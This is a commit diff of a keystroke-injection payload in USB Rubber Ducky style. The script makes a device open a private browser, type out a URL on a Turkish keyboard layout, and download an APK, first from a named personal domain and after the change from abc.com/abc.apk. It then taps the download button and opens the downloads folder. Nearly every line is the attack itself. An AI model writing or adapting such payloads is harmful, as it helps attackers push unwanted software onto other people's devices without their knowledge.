This commit is contained in:
ekaraogullari 2024-07-04 00:36:41 +03:00
parent fc8ccf2aca
commit 8f649aefb6
1 changed files with 14 additions and 7 deletions

View File

@ -1,4 +1,4 @@
REM Opens a private browser REM Opens a private browser to abc.com/abc.apk
DELAY 200 DELAY 200
ESCAPE ESCAPE
GUI d GUI d
@ -10,25 +10,32 @@ CTRL SHIFT N
DELAY 700 DELAY 700
CTRL l CTRL l
DELAY 300 DELAY 300
STRING karaogullari STRING abc
DELAY 300 DELAY 300
REM Dot character for Turkish keyboard REM Dot character for Turkish keyboard
SHIFT . ALT_SPACE
DELAY 300
DOWNARROW
ENTER
DELAY 300 DELAY 300
STRING com STRING com
DELAY 300 DELAY 300
SHIFT / REM Slash character for Turkish keyboard
SHIFT ;
DELAY 300 DELAY 300
STRING bo STRING abc
DELAY 300 DELAY 300
SHIFT . ALT_SPACE
DELAY 300
DOWNARROW
ENTER
DELAY 300 DELAY 300
STRING apk STRING apk
DELAY 300 DELAY 300
ENTER ENTER
DELAY 5000 DELAY 5000
REM Click on the download button (assumes button is in the center of the screen) REM Click on the download button (assumes button is in the center of the screen)
TOUCH 540 96 TOUCH 540 960
DELAY 10000 DELAY 10000
REM Open the downloads folder REM Open the downloads folder
GUI k GUI k